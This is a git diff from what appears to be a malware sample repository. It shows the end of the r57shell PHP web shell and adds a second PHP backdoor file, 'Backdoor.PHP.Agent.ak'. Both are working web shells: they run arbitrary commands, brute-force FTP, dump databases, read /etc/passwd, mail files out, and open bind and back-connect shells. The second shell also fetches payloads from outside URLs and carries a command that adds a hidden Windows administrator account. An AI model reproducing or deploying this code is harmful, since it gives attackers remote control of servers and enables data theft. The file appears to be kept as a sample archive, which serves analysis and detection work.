".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { err(3); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { err(3); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "
    ".$lang[$language.'_text96']."
    "; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": ".$_POST['cmd']."
    "; +echo "
    "; +echo ""; +echo ""; +function div_title($title, $id) +{ + return ''.$title.''; +} +function div($id) + { + if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return ''.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts; +echo sr(15,"".$lang[$language.'_text43'].$arrow."",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.''.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts; +echo sr(15,"".$lang[$language.'_text58'].$arrow."",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."".ws(3)."".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts; +echo sr(15,"".$lang[$language.'_text68'].$arrow."","".ws(2)."".$lang[$language.'_text69'].$arrow."".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."".$lang[$language.'_text70'].$arrow."".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.''.$table_end1.$fe; +} +if(!$safe_mode){ +$aliases2 = ''; +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= ""; + } +echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts; +echo sr(15,"".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."","".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.''.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts; +echo sr(15,"".$lang[$language.'_text52'].$arrow."",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"".$lang[$language.'_text53'].$arrow."",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"".$lang[$language.'_text55'].$arrow."",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.''.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts; +echo sr(15,"".$lang[$language.'_text72'].$arrow."",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"".$lang[$language.'_text73'].$arrow."",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"".$lang[$language.'_text74'].$arrow."",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.''.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font; +echo "
    ".div('id9').""; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "
    ".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "
    "; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts; +echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts; +echo "
    "; +echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts; +echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."".$lang[$language.'_text38'].$arrow."".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts; +echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."".$lang[$language.'_text38'].$arrow."".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"".$lang[$language.'_text3'].$arrow."",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode&&$unix&&function_exists('mb_send_mail')){ +echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts; +echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_list')){ +echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts; +echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_body')){ +echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts; +echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts; +echo sr(15,"".$lang[$language.'_text116'].$arrow."",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8')); +echo sr(15,"".$lang[$language.'_text117'].$arrow."",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo ""; +echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts; +echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile',85,'')); +echo sr(15,"".$lang[$language.'_text21'].$arrow."",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.''.$table_end1.$fe; +} +if(!$safe_mode&&$unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts; +echo sr(15,"".$lang[$language.'_text16'].$arrow."","".in('hidden','dir',0,$dir).ws(2)."".$lang[$language.'_text17'].$arrow."".in('text','rem_file',78,'http://')); +echo sr(15,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.''.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts; +echo sr(15,"".$lang[$language.'_text59'].$arrow."",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"".$lang[$language.'_text91'].$arrow."",in('radio','compress',0,'none',1).' '.$arh); +echo $te.''.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."".$fs."".$fe.$fs."".$fe."
    ".$ts; +echo "
    ".$lang[$language.'_text87']."
    "; +echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',45,$dir)); +echo sr(25,"".$lang[$language.'_text90'].$arrow."","".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."
    ".$ts; +echo "
    ".$lang[$language.'_text100']."
    "; +echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',45,$dir)); +echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"".$lang[$language.'_text90'].$arrow."","".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."
    "; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts; +echo sr(15,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","".$lang[$language.'_text99']." ( ".$lang[$language.'_text95']." )"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.''.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."".$fs."".$ts; +echo "
    ".$lang[$language.'_text103']."
    "; +echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); +echo sr(25,"".$lang[$language.'_text108'].$arrow."",''); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."".$fe.$fs."".$ts; +echo "
    ".$lang[$language.'_text104']."
    "; +echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); +echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',45,$dir)); +echo sr(25,"".$lang[$language.'_text91'].$arrow."",in('radio','compress',0,'none',1).' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."".$fe.""; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = ''; +echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."".$fs."".$ts; +echo "
    ".$lang[$language.'_text40']."
    "; +echo sr(35,"".$lang[$language.'_text80'].$arrow."",$select); +echo sr(35,"".$lang[$language.'_text111'].$arrow."",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' : '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' : '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"".$lang[$language.'_text36'].$arrow."",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' . '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."".$lang[$language.'_text41'].$arrow."",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."".$fe.$fs."".$ts; +echo "
    ".$lang[$language.'_text83']."
    "; +echo sr(35,"".$lang[$language.'_text80'].$arrow."",$select); +echo sr(35,"".$lang[$language.'_text111'].$arrow."",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' : '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' : '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"".$lang[$language.'_text39'].$arrow."",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(35,"".$lang[$language.'_text84'].$arrow."".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."

    ".in('submit','submit',0,$lang[$language.'_butt1'])."
    ".$fe.""; +} +if(!$safe_mode&&$unix){ +echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."".$fs."".$ts; +echo "
    ".$lang[$language.'_text9']."
    "; +echo sr(40,"".$lang[$language.'_text10'].$arrow."",in('text','port',15,'11457')); +echo sr(40,"".$lang[$language.'_text11'].$arrow."",in('text','bind_pass',15,'r57')); +echo sr(40,"".$lang[$language.'_text20'].$arrow."","".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."".$fe.$fs."".$ts; +echo "
    ".$lang[$language.'_text12']."
    "; +echo sr(40,"".$lang[$language.'_text13'].$arrow."",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"".$lang[$language.'_text14'].$arrow."",in('text','port',15,'11457')); +echo sr(40,"".$lang[$language.'_text20'].$arrow."","".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."".$fe.$fs."".$ts; +echo "
    ".$lang[$language.'_text22']."
    "; +echo sr(40,"".$lang[$language.'_text23'].$arrow."",in('text','local_port',15,'11457')); +echo sr(40,"".$lang[$language.'_text24'].$arrow."",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"".$lang[$language.'_text25'].$arrow."",in('text','remote_port',15,'6667')); +echo sr(40,"".$lang[$language.'_text26'].$arrow."","".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."".$fe.""; +} +echo ''.$table_up3."
    o---[ r57shell - http-shell by RST/GHC | http://rst.void.ru | http://ghc.ru | version ".$version." ]---o
    "; +echo ''; +?> + diff --git a/PHP/Backdoor.PHP.Agent.ak b/PHP/Backdoor.PHP.Agent.ak new file mode 100644 index 00000000..767e7a26 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.ak @@ -0,0 +1,712 @@ + + + + + + +By binushacker > AoD > CMD > File List + + + +

    ..:: http://www.binushacker.com #binushacker @ irc.dal.net ::..

    +OFF"; } + else { $SafeMode = "$SafeMode"; } + + $btname = 'backtool.txt'; + $bt = 'http://www.full-comandos.com/jobing/r0nin'; + $dc = 'http://www.full-comandos.com/jobing/dc.txt'; + $newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup + + +"Administrators" /add Admin;net localgroup "Users" /del Admin'; + $bn = 'http://www.binushacker.com/download/cmd.do'; +// Java Script + echo ""; + + // End JavaScript + + /* Functions */ + function cmd($CMDs) { + $CMD[1] = ''; + exec($CMDs, $CMD[1]); + if (empty($CMD[1])) { + $CMD[1] = shell_exec($CMDs); + } + elseif (empty($CMD[1])) { + $CMD[1] = passthru($CMDs); + } + elseif (empty($CMD[1])) { + $CMD[1] = system($CMDs); + } + elseif (empty($CMD[1])) { + $handle = popen($CMDs, 'r'); + while(!feof($handle)) { + $CMD[1][] .= fgets($handle); + } + pclose($handle); + } + return $CMD[1]; + } + +if (@$_GET['chdir']) { + $chdir = $_GET['chdir']; +} else { + $chdir = getcwd()."/"; + } +if (@chdir("$chdir")) { + $msg = " Pintu Masuk ke Direktori, OK!"; +} else { + $msg = "Error: Gagal memasukkan ke folder!"; + $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']); +} + $chdir = str_replace(chr(92), chr(47), $chdir); + +if (@$_GET['action'] == 'upload') { + $uploaddir = $chdir; + $uploadfile = $uploaddir. $_FILES['userfile']['name']; + if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . + +$_FILES['userfile']['name'])) { + $msg = "{$_FILES['userfile']['name']}, arsip valid, sukses dimuat. + +"; + } else { + $msg = "Error: gagal menyalin arsip."; + } +} +elseif (@$_GET['action'] == 'mkdir') { + $newdir = $_GET['newdir']; + if (@mkdir("$chdir"."$newdir")) { + $msg = "{$newdir}, folder + +berhasil dibuat. "; + } else { + $msg = "Error: Pembuatan folder gagal."; + } +} +elseif (@$_GET['action'] == 'newfile') { + $newfile = $_GET['newfile']; + if (@touch("$chdir"."$newfile")) { + $msg = "{$newfile}, berhasil + +dibuat! "; + } else { + $msg = "Error: Pembuatan arsip gagal!"; + } +} + +elseif (@$_GET['action'] == 'del') { + $file = $_GET['file']; $type = $_GET['type']; + if ($type == 'file') { + if (@unlink("$chdir"."$file")) { + $msg = "{$file}, Berhasil + +menghapus arsip (file)!"; + } else { + $msg = "Error: Gagal menghapus arsip (file)!"; + } + } elseif ($type == 'dir') { + if (@rmdir("$chdir"."$file")) { + $msg = "{$file}, Berhasil + +menghapus folder!"; + } else { + $msg = "Error: Gagal menghapus folder!"; + } + } +} +elseif (@$_GET['action'] == 'chmod') { + $file = $chdir.$_GET['file']; $chmod = $_GET['chmod']; + if (@chmod ("$file", $chmod)) { + + $msg = "Chmod dari {$_GET['file']} berubah menjadi + + +$chmod : Sukses!"; + } else { + $msg = 'Error: Gagal mengubah chmod.'; + } +} +elseif (@$_GET['action'] == 'rename') { + $file = $_GET['file']; $newname = $_GET['newname']; + if (@rename("$chdir"."$file", "$chdir"."$newname")) { + $msg = "Archive {$file} + +named for {$newname} successfully!"; + } else { + $msg = "Error: Gagal mencalonkan arsip."; + } +} +elseif (@$_GET['action'] == 'copy') { + $file = $chdir.$_GET['file']; $copy = $_GET['fcopy']; + if (@copy("$file", "$copy")) { + $msg = "{$file}, disalin + +menjadi {$copy} + + +Berhasil!"; + } else { + $msg = "Error: Gagal menyalin {$file} menjadi {$copy}"; + } +} +/* Parte Atualiza 02:48 12/2/2006 */ + +elseif (@$_GET['action'] == 'cmd') { + if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; } + if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; } + $cmd = stripslashes(trim($cmd)); + $result_arr = cmd($cmd); + + $afim = count($result_arr); $acom = 0; $msg = ''; + $msg .= "

    Hasil : ".$cmd."

    "; + if ($result_arr) { + while ($acom <= $afim) { + $msg .= "

    ".@$result_arr[$acom]."

    "; + $acom++; + } + } + else { + $msg .= "

    Error: Gagal mengeksekusi perintah.

    "; + } +} +elseif (@$_GET['action'] == 'safemode') { +if (@!extension_loaded('shmop')) { + echo "Loading... module
    "; + + if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) { + @dl('php_shmop.dll'); + } else { + @dl('shmop.so'); + } +} + +if (@extension_loaded('shmop')) { + echo "Module: shmop loaded!
    "; + + $shm_id = @shmop_open(0xff2, "c", 0644, 100); + if (!$shm_id) { echo "Couldn't create shared memory segment\n"; } + $data="\x00"; + $offset=-3842685; + $shm_bytes_written = @shmop_write($shm_id, $data, $offset); + if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of + +data\n"; } + if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; } + echo passthru("id"); + shmop_close($shm_id); + + +} else { echo "Module: shmop tidak dimuat!
    "; } +} + +elseif (@$_GET['action'] == 'zipen') { + $file = $_GET['file']; + $zip = @zip_open("$chdir"."$file"); + $msg = ''; +if ($zip) { + + while ($zip_entry = zip_read($zip)) { + $msg .= "Name: " . zip_entry_name($zip_entry) . "\n"; + $msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\n"; + $msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\n"; + $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n"; + + if (zip_entry_open($zip, $zip_entry, "r")) { + echo "File Contents:\n"; + $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry)); + echo "$buf\n"; + + zip_entry_close($zip_entry); + } + echo "\n"; + + } + + zip_close($zip); + +} +} +elseif (@$_GET['action'] == 'edit') { + $file = $_GET['file']; + $conteudo = ''; + $filename = "$chdir"."$file"; + $conteudo = @file_get_contents($filename); + $conteudo = htmlspecialchars($conteudo); + $back = $_SERVER['HTTP_REFERER']; + echo "

    Editing {$file} ...

    "; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    "; + echo ""; + echo "

    "; + print "

    "; + echo "

    "; + echo " "; + echo " "; + echo ""; + echo "

    "; +} +elseif (@$_GET['action'] == 'save') { + $filename = "$chdir".$_GET['file']; + $somecontent = $_POST['S1']; + $somecontent = stripslashes(trim($somecontent)); + if (is_writable($filename)) { + @$handle = fopen ($filename, "w"); + @$fw = fwrite($handle, $somecontent); + @fclose($handle); + if ($handle && $fw) { + $msg = "{$_GET['file']}, berhasil diedit!"; + } + } else { + $msg = "{$_GET['file']}, tidak + +bisa ditulisi!"; + } +} + +// Informaçs + $cmdget = ''; + if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; } + if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; } + $cmdget = htmlspecialchars($cmdget); + function asdads() { + $asdads = ''; + if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; } + if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; } + if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; } + if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; } + if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; } + return $asdads; + } + +echo "
    "; +echo "
    "; +echo "Informasi"; +echo "
    "; +echo ""; +echo " "; +echo ""; +echo ""; +echo ""; +echo " "; +echo ""; +echo ""; +echo ""; +echo " "; +echo ""; +echo ""; + if (strtoupper(substr($OS, 0,3) != 'WIN')) { + $Methods = asdads(); + if ($Methods == '') { $Methods = "???"; } + echo ""; + echo " "; + echo ""; + echo ""; + } + +echo ""; +echo " "; +echo ""; +echo ""; +echo ""; +echo " "; +echo ""; +echo ""; +echo "
    "; +echo " Sistem : {$OS}
    "; +echo " Nama : {$UNAME}
    "; +echo " PHP : {$PHPv}, Safe Mode : {$SafeMode}
    "; + echo "Methods : {$Methods}
    "; +echo " IP : {$IpServer}
    "; +echo " Perintah :

    "; +echo "
    "; +// Dir + +echo "
    "; +echo "
    "; +if (is_writable("$chdir")) { + if (strtoupper(substr($OS, 0,3) == 'WIN')) { + echo "Dir YES: {$chdir} - Folder Baru | File Baru | Remote + +Access"; + } else { + echo "Dir YES: {$chdir} - Folder Baru | File Baru | Kembali"; + } +} +else { +if (strtoupper(substr($OS, 0,3) == 'WIN')) { + echo "Dir NO: {$chdir} - Foldr Baru | File Baru | Remote + +Access"; + } else { + echo "Dir NO: {$chdir} - Folder Baru | File Baru | Kembali + +"; + } +} + +if (@!$handle = opendir("$chdir")) { + echo " Gue gak bisa masuk folder, Klik sini! untuk embali ke + +folder ori!
    "; +} +else { +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +} else { + echo "

    $msg"; + } +echo "

    "; +echo " "; +echo " "; +echo "
    Upload:"; +echo " "; +echo "
    "; +if (@!$msg) { + echo "

    Messages

